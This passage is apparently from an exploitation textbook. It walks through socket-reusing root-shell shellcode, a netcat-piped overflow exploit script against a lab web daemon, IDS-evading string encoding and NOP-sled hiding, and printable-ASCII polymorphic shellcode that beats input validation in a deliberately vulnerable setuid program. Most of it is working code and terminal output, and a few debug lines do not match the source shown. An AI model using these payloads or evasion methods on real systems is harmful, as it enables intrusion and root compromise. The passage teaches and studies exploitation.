   lea edx, [esp+0x5c]  ; Put the address of new_sockfd in edx.
   mov ebx, [edx]       ; Put the value of new_sockfd in ebx.
   push BYTE 0x02
   pop ecx          ; ecx starts at 2.
   xor eax, eax
   xor edx, edx
dup_loop:
   mov BYTE al, 0x3F ; dup2  syscall #63
   int 0x80          ; dup2(c, 0)
   dec ecx           ; Count down to 0.
   jns dup_loop      ; If the sign flag is not set, ecx is not negative.

; execve(const char *filename, char *const argv [], char *const envp[])
   mov BYTE al, 11   ; execve  syscall #11
   push edx          ; push some nulls for string termination.
   push 0x68732f2f   ; push "//sh" to the stack.
   push 0x6e69622f   ; push "/bin" to the stack.
   mov ebx, esp      ; Put the address of "/bin//sh" into ebx, via esp.
   push edx          ; push 32-bit null terminator to stack.
   mov edx, esp      ; This is an empty array for envp.
   push ebx          ; push string addr to stack above null terminator.
   mov ecx, esp      ; This is the argv array with string ptr.
   int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

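To use this shellcode effectively, we need another exploitation tool that lets us send the exploit buffer but keeps the socket open for further I/O. This second exploit script adds an additional cat - command to the end of the exploit buffer. The dash argument means standard input. Running cat on standard input is somewhat useless in itself, but when the command is piped into netcat, it effectively ties standard input and output to netcat's network socket. The script below connects to the target, sends the exploit buffer, and then keeps the socket open and takes further input from the terminal. This is done with just a few modifications to the silent exploit tool: an extra header comment, the trailing cat - command, and the removal of netcat's -w 1 timeout.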

xtool_tinywebd_reuse.sh

#!/bin/sh
# Silent stealth exploitation tool for tinywebd
#    also spoofs IP address stored in memory
#    reuses existing socket; use socket_reuse shellcode

SPOOFIP="12.34.56.78"
SPOOFPORT="9090"

if [ -z "$2" ]; then  # if argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0
FAKEADDR="\xcf\xf5\xff\xbf" # +15 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE - 16))

echo "[Fake Request $FR_SIZE] [spoof IP 16] [NOP $ALIGNED_SLED_SIZE] [shellcode $SIZE] [ret addr 128] [*fake_addr 8]"
(perl -e "print \"$FAKEREQUEST\"";
 ./addr_struct "$SPOOFIP" "$SPOOFPORT";
 perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
perl -e "print \"$RETADDR\"x32 . \"$FAKEADDR\"x2 . \"\x01\x00\x00\x00\r\n\"";
 cat -;) | nc -v $2 80

When this tool is used with the socket_reuse_restore shellcode, the root shell is served up over the same socket used for the web request. The following output demonstrates this.

reader@hacking:~/booksrc $ nasm socket_reuse_restore.s
reader@hacking:~/booksrc $ hexdump -C socket_reuse_restore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X....t..l$hh..|
00000010  04 08 c3 8d 54 24 5c 8b  1a 6a 02 59 31 c0 31 d2  |....T$\..j.Y1.1.|
00000020  b0 3f cd 80 49 79 f9 b0  0b 52 68 2f 2f 73 68 68  |.?..Iy...Rh//shh|
00000030  2f 62 69 6e 89 e3 52 89  e2 53 89 e1 cd 80        |/bin..R..S....|
0000003e
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ./xtool_tinywebd_reuse.sh socket_reuse_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: socket_reuse_restore (62 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 323] [shellcode 62] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
whoami
root

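By reusing the existing socket, this exploit is even quieter since it doesn't create any additional connections. Fewer connections mean fewer abnormalities for any countermeasures to detect.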

Payload Smuggling

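The aforementioned network IDS or IPS systems can do more than just track connections; they can also inspect the packets themselves. Usually, these systems are looking for patterns that would signify an attack. For example, a simple rule looking for packets that contain the string /bin/sh would catch a lot of packets containing shellcode. Our /bin/sh string is already slightly obfuscated since it's pushed to the stack in four-byte chunks, but a network IDS could also look for packets that contain the strings /bin and //sh.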

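These types of network IDS signatures can be fairly effective at catching script kiddies who are using exploits they downloaded from the Internet. However, they are easily bypassed with custom shellcode that hides any telltale strings.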

String Encoding

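To hide the string, we will simply add 5 to each byte in the string. Then, after the string has been pushed to the stack, the shellcode will subtract 5 from each string byte on the stack. This builds the desired string on the stack so it can be used in the shellcode, while keeping it hidden during transit. The output below shows the calculation of the encoded bytes.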

reader@hacking:~/booksrc $ echo "/bin/sh" | hexdump -C
00000000  2f 62 69 6e 2f 73 68 0a                           |/bin/sh.|
00000008
reader@hacking:~/booksrc $ gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit
reader@hacking:~/booksrc $

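The following shellcode pushes these encoded bytes to the stack and then decodes them in a loop. Also, two int3 instructions are used to put breakpoints in the shellcode before and after the decoding. This is an easy way to see what's going on with GDB.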

encoded_sockreuserestore_dbg.s

BITS 32

   push BYTE 0x02    ; Fork is syscall #2.
   pop eax
   int 0x80          ; After the fork, in child process eax == 0.
   test eax, eax
   jz child_process  ; In child process spawns a shell.

      ; In the parent process, restore tinywebd.
   lea ebp, [esp+0x68]  ; Restore EBP.
   push 0x08048fb7      ; Return address.
   ret                  ; Return

child_process:
    ; Re-use existing socket.
   lea edx, [esp+0x5c]  ; Put the address of new_sockfd in edx.
   mov ebx, [edx]       ; Put the value of new_sockfd in ebx.
   push BYTE 0x02
   pop ecx          ; ecx starts at 2.
   xor eax, eax
dup_loop:
   mov BYTE al, 0x3F ; dup2  syscall #63
   int 0x80          ; dup2(c, 0)
   dec ecx           ; Count down to 0.
   jns dup_loop      ; If the sign flag is not set, ecx is not negative

; execve(const char *filename, char *const argv [], char *const envp[])
   mov BYTE al, 11   ; execve  syscall #11
   push 0x056d7834   ; push "/sh\x00" encoded +5 to the stack.
   push 0x736e6734   ; push "/bin" encoded +5 to the stack.
   mov ebx, esp      ; Put the address of encoded "/bin/sh" into ebx.

int3 ; Breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)

   push BYTE 0x8     ; Need to decode 8 bytes
   pop edx
decode_loop:
   sub BYTE [ebx+edx], 0x5
   dec edx
   jns decode_loop

int3  ; Breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)

   xor edx, edx
   push edx          ; push 32-bit null terminator to stack.
   mov edx, esp      ; This is an empty array for envp.
   push ebx          ; push string addr to stack above null terminator.
   mov ecx, esp      ; This is the argv array with string ptr.
   int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

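The decoding loop uses the EDX register as a counter. It counts from 8 down to 0, since 8 bytes need to be decoded. (Because the loop also runs for index 8, it actually adjusts nine bytes; the extra one is the byte on the stack just past the end of the string.) Exact stack addresses don't matter in this case, since the important parts are all relatively addressed, so the output below doesn't bother attaching to an existing tinywebd process.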

reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q ./a.out

warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/reader/booksrc/a.out
Starting tiny web daemon..

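Since the breakpoints are actually part of the shellcode, there is no need to set one from GDB. From another terminal, the shellcode is assembled and used with the socket-reusing exploit tool.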

From Another Terminal

reader@hacking:~/booksrc $ nasm encoded_sockreuserestore_dbg.s
reader@hacking:~/booksrc $ ./xtool_tinywebd_reuse.sh encoded_sockreuserestore_dbg 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore_dbg (72 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 313] [shellcode 72] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open

Back in the GDB window, the first int3 instruction in the shellcode is hit. From here, we can verify that the string decodes properly.

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 12400]
0xbffff6ab in ?? ()
(gdb) x/10i $eip
0xbffff6ab:     push   0x8
0xbffff6ad:     pop    edx
0xbffff6ae:     sub    BYTE PTR [ebx+edx],0x5
0xbffff6b2:     dec    edx
0xbffff6b3:     jns    0xbffff6ae
0xbffff6b5:     int3
0xbffff6b6:     xor    edx,edx
0xbffff6b8:     push   edx
0xbffff6b9:     mov    edx,esp
0xbffff6bb:     push   ebx
(gdb) x/8c $ebx
0xbffff738:     52 '4'  103 'g' 110 'n' 115 's' 52 '4'  120 'x' 109 'm' 5 '\005'
(gdb) cont
Continuing.
[tcsetpgrp failed in terminal_inferior: Operation not permitted]

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff6b6 in ?? ()
(gdb) x/8c $ebx
0xbffff738:     47 '/'  98 'b'  105 'i' 110 'n' 47 '/'  115 's' 104 'h' 0 '\0'
(gdb) x/s $ebx
0xbffff738:      "/bin/sh"
(gdb)

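Now that the decoding has been verified, the int3 instructions can be removed from the shellcode. The following output shows the final shellcode being used.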

reader@hacking:~/booksrc $ sed -e 's/int3/;int3/g' encoded_sockreuserestore_dbg.s > encoded_sockreuserestore.s
reader@hacking:~/booksrc $ diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s
33c33
< int3  ; Breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
---
> ;int3  ; Breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
42c42
< int3  ; Breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
---
> ;int3  ; Breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
reader@hacking:~/booksrc $ nasm encoded_sockreuserestore.s
reader@hacking:~/booksrc $ hexdump -C encoded_sockreuserestore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X....t..l$hh..|
00000010  04 08 c3 8d 54 24 5c 8b  1a 6a 02 59 31 c0 b0 3f  |....T$\..j.Y1..?|
00000020  cd 80 49 79 f9 b0 0b 68  34 78 6d 05 68 34 67 6e  |..Iy...h4xm.h4gn|
00000030  73 89 e3 6a 08 5a 80 2c  13 05 4a 79 f9 31 d2 52  |s..j.Z.,..Jy.1.R|
00000040  89 e2 53 89 e1 cd 80                              |..S....|
00000047
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon..
reader@hacking:~/booksrc $ ./xtool_tinywebd_reuse.sh encoded_sockreuserestore 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 314] [shellcode 71] [ret addr 128] [*fake_addr 8]
localhost [127.0.0.1] 80 (www) open
whoami
root

How to Hide a Sled

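The NOP sled is another signature that is easy for network IDSes and IPSes to detect. Large blocks of 0x90 aren't that common, so if a network security mechanism sees something like this, it's probably an exploit. To avoid this signature, we can use different single-byte instructions instead of NOP. There are several one-byte instructions (the increment and decrement instructions for various registers) that are also printable ASCII characters.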

Instruction	Hex	ASCII
inc eax	0x40	@
inc ebx	0x43	C
inc ecx	0x41	A
inc edx	0x42	B
dec eax	0x48	H
dec ebx	0x4B	K
dec ecx	0x49	I
dec edx	0x4A	J

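Since we zero out these registers before we use them, we can safely use a random combination of these bytes for the NOP sled. Creating a new exploit tool that uses random combinations of the bytes @, C, A, B, H, K, I, and J instead of a regular NOP sled will be left as an exercise for the reader. The easiest way to do this would be to write a sled-generation program in C, which is used with a BASH script. This modification will hide the exploit buffer from IDSes that look for a NOP sled.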

Buffer Restrictions

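Sometimes a program will place certain restrictions on buffers. This type of data sanity-checking can prevent many vulnerabilities. Consider the following example program, which is used to update product descriptions in a fictitious database. The first argument is the product code, and the second is the updated description. This program doesn't actually update a database, but it does have an obvious vulnerability in it.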


update_info.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>   /* isprint() */

#define MAX_ID_LEN 40
#define MAX_DESC_LEN 500

/* Barf a message and exit. */
void barf(char *message, void *extra) {
   printf(message, extra);
   exit(1);
}

/* Pretend this function updates a product description in a database. */
void update_product_description(char *id, char *desc)
{
   char product_code[5], description[MAX_DESC_LEN];

   printf("[DEBUG]: description is at %p\n", description);

   strncpy(description, desc, MAX_DESC_LEN);
   strcpy(product_code, id);

   printf("Updating product #%s with description \'%s\'\n", product_code, desc);
   // Update database
}

int main(int argc, char *argv[], char *envp[])
{
  int i;
  char *id, *desc;

  if(argc < 3) // Both <id> and <description> are required.
     barf("Usage: %s <id> <description>\n", argv[0]);
  id = argv[1];   // id - Product code to update in DB 
  desc = argv[2]; // desc - Item description to update

  if(strlen(id) > MAX_ID_LEN) // id must be less than MAX_ID_LEN bytes.
     barf("Fatal: id argument must be less than %u bytes\n", (void *)MAX_ID_LEN);

  for(i=0; i < strlen(desc)-1; i++) { // Only allow printable bytes in desc.
     if(!(isprint(desc[i])))
        barf("Fatal: description argument can only contain printable bytes\n", NULL);
  }

  // Clearing out the stack memory (security)
  // Clearing all arguments except the first and second
  memset(argv[0], 0, strlen(argv[0]));
  for(i=3; argv[i] != 0; i++)
    memset(argv[i], 0, strlen(argv[i]));
  // Clearing all environment variables
  for(i=0; envp[i] != 0; i++)
    memset(envp[i], 0, strlen(envp[i]));

  printf("[DEBUG]: desc is at %p\n", desc);

  update_product_description(id, desc); // Update database.
}

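Despite the vulnerability, the code does make an attempt at security. The length of the product ID argument is restricted, and the contents of the description argument are limited to printable characters. In addition, the unused environment variables and program arguments are cleared out for security reasons. The first argument (id) is too small for shellcode, and since the rest of the stack memory is cleared out, there's only one place left.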

reader@hacking:~/booksrc $ gcc -o update_info update_info.c
reader@hacking:~/booksrc $ sudo chown root ./update_info
reader@hacking:~/booksrc $ sudo chmod u+s ./update_info
reader@hacking:~/booksrc $ ./update_info
Usage: ./update_info <id> <description>
reader@hacking:~/booksrc $ ./update_info OCP209 "Enforcement Droid"
[DEBUG]: description is at 0xbffff650
Updating product #OCP209 with description 'Enforcement Droid'
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "AAAA"x10') blah
[DEBUG]: description is at 0xbffff650
Segmentation fault
reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "\xf2\xf9\xff\xbf"x10') $(cat ./shellcode.bin)
Fatal: description argument can only contain printable bytes
reader@hacking:~/booksrc $

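This output shows a sample usage and then tries to exploit the vulnerable strcpy() call. Although the return address can be overwritten using the first argument (id), the only place we can put shellcode is in the second argument (desc). However, this buffer is checked for nonprintable bytes. The debugging output below confirms that this program could be exploited if there were a way to put shellcode in the description argument.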

reader@hacking:~/booksrc $ gdb -q ./update_info
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1"
(gdb) run $(perl -e 'print "\xcb\xf9\xff\xbf"x10') blah
The program being debugged has been started already
Start it from the beginning? (y or n) y

Starting program: /home/reader/booksrc/update_info $(perl -e 'print "\xcb\xf9\xff\xbf"x10') blah
[DEBUG]: desc is at 0xbffff9cb
Updating product # with description 'blah'

Program received signal SIGSEGV, Segmentation fault.
0xbffff9cb in ?? ()
(gdb) i r eip
eip            0xbffff9cb       0xbffff9cb
(gdb) x/s $eip
0xbffff9cb:      "blah"
(gdb)

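The printable input validation is the only thing stopping exploitation. Like airport security, this input validation loop inspects everything coming in. And while it's not possible to avoid this check, there are ways to smuggle illicit data past the guards.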

Polymorphic Printable ASCII Shellcode

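Polymorphic shellcode refers to any shellcode that changes itself. The encoding shellcode from the previous section is technically polymorphic, since it modifies the string it uses while it's running. The new NOP sled uses instructions that assemble into printable ASCII bytes. There are other instructions that fall into this printable range (from 0x20 to 0x7e); however, the total set is actually rather small.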

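The goal is to write shellcode that will get past the printable character check. Trying to write complex shellcode with such a limited instruction set would simply be masochistic, so instead, the printable shellcode will use simple methods to build more complex shellcode on the stack. In this way, the printable shellcode will actually be instructions for making the real shellcode.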

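The first step is figuring out a way to zero out registers. Unfortunately, the XOR instruction on the various registers doesn't assemble into the printable ASCII character range. One option is to use the AND bitwise operation, which assembles into the percent character (%) when using the EAX register. The assembly instruction and eax, 0x41414141 will assemble to the printable machine code %AAAA, since 0x41 in hexadecimal is the printable character A.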

An AND operation transforms bits as follows:

1 and 1 = 1
0 and 0 = 0
1 and 0 = 0
0 and 1 = 0

Since the only case where the result is 1 is when both bits are 1, ANDing two values that have no 1 bits in common onto EAX leaves EAX zero.

    Binary                                 Hexadecimal
    01000101010011100100111101001010       0x454e4f4a
AND 00111010001100010011000000110101   AND 0x3a313035
-------------------------------------  ---------------
    00000000000000000000000000000000       0x00000000

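Thus, by using two printable 32-bit values whose set bits never overlap, the EAX register can be zeroed without using any null bytes, and the resulting assembled machine code will be printable text.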

and eax, 0x454e4f4a  ; Assembles into %JONE
and eax, 0x3a313035  ; Assembles into %501:

So %JONE%501: in machine code will zero out the EAX register. Interesting. Some other instructions that assemble into printable ASCII characters are shown below.

sub eax, 0x41414141    -AAAA
push eax               P
pop eax                X
push esp               T
pop esp                \

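Amazingly, these instructions, combined with the AND eax instruction, are sufficient to build loader code that will inject the shellcode onto the stack and then execute it. The general technique is, first, to set ESP back behind the executing loader code (in higher memory addresses), and then to build the shellcode from end to start by pushing values onto the stack, as shown in the figure.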

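Since the stack grows up (from higher memory addresses to lower memory addresses), ESP will move backward as values are pushed to the stack, and EIP will move forward as the loader code executes. Eventually, EIP and ESP will meet up, and EIP will continue executing into the freshly built shellcode.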

Figure 0x600-1.

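First, ESP must be set behind the printable loader shellcode. A little debugging with GDB shows that after gaining control of program execution, ESP is 555 bytes before the start of the overflow buffer (which will contain the loader code). The ESP register must be moved so it's after the loader code, while still leaving room for the new shellcode and for the loader shellcode itself. About 300 bytes should be enough room for this, so let's add 860 bytes to ESP to put it 305 bytes past the start of the loader code. This value doesn't need to be exact, since provisions will be made later to allow for some slop. Since the only usable instruction is subtraction, addition can be simulated by subtracting so much from the register that it wraps around. The register only has 32 bits of space, so adding 860 to a register is the same as subtracting 2^32 - 860, or 4,294,966,436, from it. However, this subtraction must only use printable values, so we split it up across three instructions that all use printable operands.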

sub eax, 0x39393333  ; Assembles into -3399
sub eax, 0x72727550  ; Assembles into -Purr
sub eax, 0x54545421  ; Assembles into -!TTT

As confirmed in the GDB output, subtracting these three values from a 32-bit number is the same as adding 860 to it.

reader@hacking:~/booksrc $ gdb -q
(gdb) print  0 - 0x39393333 - 0x72727550 - 0x54545421
$1 = 860
(gdb)

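The goal is to subtract these values from ESP, not EAX, but the instruction sub esp doesn't assemble into a printable ASCII character. So the current value of ESP must be moved into EAX for the subtraction, and then the new value of EAX must be moved back into ESP.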

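However, since neither mov esp, eax nor mov eax, esp assembles into printable ASCII characters, this exchange must be done using the stack. By pushing the value from the source register to the stack and then popping it off into the destination register, the equivalent of a mov dest, source instruction can be accomplished with push source and pop dest. Fortunately, the pop and push instructions for both the EAX and ESP registers assemble into printable ASCII characters, so this can all be done using printable ASCII.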

Here is the final set of instructions to add 860 to ESP.

push esp             ; Assembles into T
pop eax              ; Assembles into X

sub eax, 0x39393333  ; Assembles into -3399
sub eax, 0x72727550  ; Assembles into -Purr
sub eax, 0x54545421  ; Assembles into -!TTT

push eax             ; Assembles into P
pop esp              ; Assembles into \

This means that TX-3399-Purr-!TTTP\ will add 860 to ESP in machine code. So far, so good. Now the shellcode must be built.

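First, EAX must be zeroed out, which is easy now that a method has been discovered. Then, using more sub instructions, the EAX register must be set to the last four bytes of the shellcode, in reverse order. Since the stack normally grows upward (toward lower memory addresses) and builds with a FILO ordering, the first value pushed to the stack must be the last four bytes of the shellcode. These bytes must be in reverse order, due to the little-endian byte ordering. The following output shows a hexadecimal dump of the standard shellcode used in the previous chapters, which will be built by the printable loader code.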

reader@hacking:~/booksrc $ hexdump -C ./shellcode.bin
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|

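In this case, the last four bytes are 89 e1 cd 80, so the proper value for the EAX register is 0x80cde189. This is easy to do by using sub instructions to wrap the value around. Then, EAX can be pushed to the stack. This moves ESP up (toward lower memory addresses) to the end of the newly pushed value, ready for the next four bytes of shellcode (51 89 e2 53). More sub instructions are used to wrap EAX around to 0x53e28951, and this value is then pushed to the stack. As this process is repeated for each four-byte chunk, the shellcode is built from end to start, toward the executing loader code.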

00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 89  |//shh/bin..Q..S.|
00000020  e1 cd 80                                          |...|

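Eventually, the beginning of the shellcode is reached, but there are only three bytes (31 c0 31) left after pushing 0x99c931db to the stack. This situation is alleviated by inserting one single-byte NOP instruction at the beginning of the code, resulting in the value 0x31c03190 being pushed to the stack; 0x90 is machine code for NOP.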

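Each of these four-byte chunks of the original shellcode is generated with the printable subtraction method used earlier. The following source code is a program to help calculate the necessary printable values.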

printable_helper.c

#define _GNU_SOURCE   /* strfry() is a GNU extension */
#include <stdio.h>
#include <sys/stat.h>
#include <ctype.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>  /* bzero() */

#define CHR "%_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-"

int main(int argc, char* argv[])
{
   unsigned int targ, last, t[4], l[4];
   unsigned int try, single, carry=0;
   int len, a, i, j, k, m, z, flag=0;
   char word[4][4]; // Up to four operands are tried (a = 1..4).
   unsigned char mem[70];

   if(argc < 3) { // Both the start and end values are required.
      printf("Usage: %s <EAX starting value> <EAX end value>\n", argv[0]);
      exit(1);
   }

   srand(time(NULL));
   bzero(mem, 70);
   strcpy(mem, CHR);
   len = strlen(mem);
   strfry(mem); // Randomize
   last = strtoul(argv[1], NULL, 0);
   targ = strtoul(argv[2], NULL, 0);

   printf("calculating printable values to subtract from EAX..\n\n");
   t[3] = (targ & 0xff000000)>>24; // Splitting by bytes
   t[2] = (targ & 0x00ff0000)>>16;
   t[1] = (targ & 0x0000ff00)>>8;
   t[0] = (targ & 0x000000ff);
   l[3] = (last & 0xff000000)>>24;
   l[2] = (last & 0x00ff0000)>>16;
   l[1] = (last & 0x0000ff00)>>8;
   l[0] = (last & 0x000000ff);

   for(a=1; a < 5; a++) { // Value count
      carry = flag = 0;
      for(z=0; z < 4; z++) { // Byte count
         for(i=0; i < len; i++) {
            for(j=0; j < len; j++) {
               for(k=0; k < len; k++) {
                  for(m=0; m < len; m++)
                  {
                     if(a < 2) j = len+1;
                     if(a < 3) k = len+1;
                     if(a < 4) m = len+1;
                     try = t[z] + carry+mem[i]+mem[j]+mem[k]+mem[m];
                     single = (try & 0x000000ff);
                     if(single == l[z])
                     {
                        carry = (try & 0x0000ff00)>>8;
                        if(i < len) word[0][z] = mem[i];
                        if(j < len) word[1][z] = mem[j];
                        if(k < len) word[2][z] = mem[k];
                        if(m < len) word[3][z] = mem[m];
                        i = j = k = m = len+2;
                        flag++;
                     }
                  }
               }
            }
         }
      }
      if(flag == 4) { // If all 4 bytes found
         printf("start: 0x%08x\n\n", last);
         for(i=0; i < a; i++)
            printf("     - 0x%08x\n", *((unsigned int *)word[i]));
         printf("-------------------\n");
         printf("end:   0x%08x\n", targ);

         exit(0);
      }
   }
}

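When this program is run, it expects two arguments: the start and the end values for EAX. For the printable loader shellcode, EAX is zeroed out to start with, and the end value should be 0x80cde189. This value corresponds to the last four bytes from shellcode.bin.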

reader@hacking:~/booksrc $ gcc -o printable_helper printable_helper.c
reader@hacking:~/booksrc $ ./printable_helper 0 0x80cde189
calculating printable values to subtract from EAX..

start: 0x00000000

     - 0x346d6d25
     - 0x256d6d25
     - 0x2557442d
-------------------
end:   0x80cde189
reader@hacking:~/booksrc $ hexdump -C ./shellcode.bin 
00000000  31 c0 31 db 31 c9 99 b0  a4 cd 80 6a 0b 58 51 68  |1.1.1......j.XQh|
00000010  2f 2f 73 68 68 2f 62 69  6e 89 e3 51 89 e2 53 `89`  |//shh/bin..Q..S.|
00000020  `e1 cd 80`                                          |...|
00000023
reader@hacking:~/booksrc $ ./printable_helper 0x80cde189 0x53e28951
calculating printable values to subtract from EAX..

start: 0x80cde189

     - 0x59316659
     - 0x59667766
     - 0x7a537a79
-------------------
end:   0x53e28951 
reader@hacking:~/booksrc $

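The output above shows the printable values needed to wrap the zeroed EAX register around to 0x80cde189 (shown in bold). Next, EAX should be wrapped around again to 0x53e28951 for the next four bytes of the shellcode (building backwards). This process is repeated until all the shellcode is built. The code for the entire process is shown below.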
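The wraparound arithmetic in the helper output can be checked independently. The following is a minimal sketch; the function names are hypothetical, and "printable" is assumed here to mean every byte falls in the visible ASCII range 0x21 to 0x7e, which is looser than the CHR set used by printable_helper.c.

```c
#include <stddef.h>
#include <stdint.h>

/* Subtract each value from start with 32-bit wraparound,
 * mirroring a chain of x86 "sub eax, imm32" instructions. */
uint32_t sub_chain(uint32_t start, const uint32_t *values, size_t count)
{
    uint32_t eax = start;
    for (size_t i = 0; i < count; i++)
        eax -= values[i];   /* unsigned arithmetic wraps modulo 2^32 */
    return eax;
}

/* Returns 1 if all four bytes of v are visible ASCII (0x21..0x7e). */
int is_printable_word(uint32_t v)
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((v >> (8 * i)) & 0xff);
        if (b < 0x21 || b > 0x7e)
            return 0;
    }
    return 1;
}
```

Feeding in the three values from the first run with a start of 0 gives 0x80cde189, and the second set of three takes 0x80cde189 to 0x53e28951. The targets themselves are not printable, which is why they have to be reached by subtraction.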

printable.s

BITS 32
push esp                ; Put current ESP
pop eax                 ;   into EAX.
sub eax,0x39393333      ; Subtract printable values
sub eax,0x72727550      ;   to add 860 to EAX.
sub eax,0x54545421
push eax                ; Put EAX back into ESP.
pop esp                 ;   Effectively ESP = ESP + 860
and eax,0x454e4f4a
and eax,0x3a313035      ; Zero out EAX.

sub eax,0x346d6d25      ; Subtract printable values 
sub eax,0x256d6d25      ;   to make EAX = 0x80cde189.
sub eax,0x2557442d      ;   (last 4 bytes from shellcode.bin)
push eax                ; Push these bytes to stack at ESP.
sub eax,0x59316659      ; Subtract more printable values
sub eax,0x59667766      ;  to make EAX = 0x53e28951.
sub eax,0x7a537a79      ;  (next 4 bytes of shellcode from the end)

push eax
sub eax,0x25696969
sub eax,0x25786b5a
sub eax,0x25774625
push eax                ; EAX = 0xe3896e69
sub eax,0x366e5858
sub eax,0x25773939
sub eax,0x25747470
push eax                ; EAX = 0x622f6868
sub eax,0x25257725
sub eax,0x71717171
sub eax,0x5869506a
push eax                ; EAX = 0x732f2f68
sub eax,0x63636363
sub eax,0x44307744
sub eax,0x7a434957
push eax                ; EAX = 0x51580b6a
sub eax,0x63363663
sub eax,0x6d543057
push eax                ; EAX = 0x80cda4b0
sub eax,0x54545454
sub eax,0x304e4e25
sub eax,0x32346f25
sub eax,0x302d6137
push eax                ; EAX = 0x99c931db
sub eax,0x78474778
sub eax,0x78727272
sub eax,0x774f4661
push eax                ; EAX = 0x31c03190
sub eax,0x41704170
sub eax,0x2d772d4e
sub eax,0x32483242
push eax                ; EAX = 0x90909090
push eax
push eax                ; Build a NOP sled.
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax

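At the end, the shellcode has been built somewhere after the loader code, most likely leaving a gap between the newly built shellcode and the executing loader code. This gap can be bridged by building a NOP sled between the loader code and the shellcode.

Once again, sub instructions are used to set EAX to 0x90909090, and EAX is repeatedly pushed to the stack. With each push instruction, four NOP instructions are tacked onto the beginning of the shellcode. Eventually, these NOP instructions will build right over the executing push instructions of the loader code, allowing EIP and program execution to flow over the sled into the shellcode.

This assembles into a printable ASCII string, which doubles as executable machine code.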

reader@hacking:~/booksrc $ nasm printable.s
reader@hacking:~/booksrc $ echo $(cat ./printable)
TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%
-ptt%P-
%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--
B2H2PPPPPPPPPPPPPPPPPPPPPP
reader@hacking:~/booksrc $

This printable ASCII shellcode can now be used to smuggle the actual shellcode past the input-validation routine of the update_info program.

reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "AAAA"x10') $(cat ./printable)
[DEBUG]: desc argument is at 0xbffff910
Segmentation fault
reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "\x10\xf9\xff\xbf"x10') $(cat ./printable)
[DEBUG]: desc argument is at 0xbffff910
Updating product ########### with description 'TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%
--DW%P-
Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c
-W0TmP-
TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP'
sh-3.2# whoami
root
sh-3.2#

